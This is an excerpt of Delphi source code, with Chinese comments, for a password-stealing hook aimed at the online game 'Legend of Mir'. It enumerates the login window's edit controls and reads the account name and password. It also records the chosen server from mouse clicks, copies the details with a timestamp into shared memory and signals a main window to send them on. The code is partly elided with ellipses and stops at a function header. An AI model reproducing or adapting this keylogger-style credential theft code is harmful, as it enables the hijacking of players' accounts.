获取“传奇”密码、区域、服务器的主要代码 
unit unitHook; 

interface 
…… 
function EnableHook:Boolean;stdcall //有效钩子程序 
function DisableHook:Boolean;stdcall; //无效钩子程序 
…… 
implementation 
…… 
//列举子窗体的回调函数 
function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall; 
var 
szClassName: array[0..255] of char; 
begin 
Result := True; //设定为True才会再找下一个 
GetClassName(hChild, szClassName, 255); 
if StrPas(szClassName)='TEdit' then begin 
inc(numEdit); 
if numEdit=1 then 
hEdit2:= hChild //密码 
else if numEdit=2 then 
hEdit1:= hChild //账号 
end; 
end; 

//取密码 
procedure GetPassword; 
var 
ss,ID,PW:string; 
begin 
numEdit:=0;//识别TEdit控件数量 
EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);//列举控件 
if numEdit=2 then begin 
ID:=trim(GetCaption(hEdit1)); 
PW:=trim(GetCaption(hEdit2)); 
if (ID<>'')and(PW<>'') then begin 
nNext:=3; 
ss:=Format('账号=%s,密码=%s',[ID,PW])+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now); 
StrCopy(@pShMem^.Text,PChar(ss)); 
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知 
end; 
end; 
end; 

//取服务器名 
procedure GetServerName; 
const 
x1=310;x2=477; 
y1=144; 
d=3; //服务器名按钮间隔 
step=42; //服务器名按钮步长 
var 
P : TPoint; 
yy, n1, n2 : integer; 
IniFileName, Ident, ss : string; 
begin 
GetCursorPos(P); //获取当前鼠标的坐标 
if (p.X<x1) or (p.X>x2) or (p.Y<y1) then exit; //鼠标点击不在服务器名的区域中 

yy:=p.Y-y1; 
n1:=yy div step; 
n2:=(yy+d) div step; 
if n1=n2 then inc(n1) 
else n1:=0; 

if n1=0 then exit; //鼠标点击不在服务器名上 

IniFileName:=ExtractFilePath(ParamStr(0))+'ftp.ini'; 
Ident:='server'+IntToStr(n1)+'caption'; 
ss:=ReadStringFromIniFile(IniFileName,Ident); 
if ss<>'' then begin 
ss:=ss+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now); 
StrCopy(@pShMem^.Text,PChar('服务器='+ss)); 
//PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 2, 2); //通知 
PostMessage(pShMem^.hMainWnd, WM_MOUSEPT, 10, 2); //通知取信息,并反馈发送 
end; 
end; 

//鼠标钩子过程，由判断鼠标的动作来决定writetotxt 
//参数分别是钩子代码，wParam鼠标消息号，lParam指向一个MOUSEHOOKSTRUCT （包含了有关鼠标事件的信息） 
function MouseHookPro(iCode:integer; wParam:wparam; lParam:lparam): LResult;stdcall;export;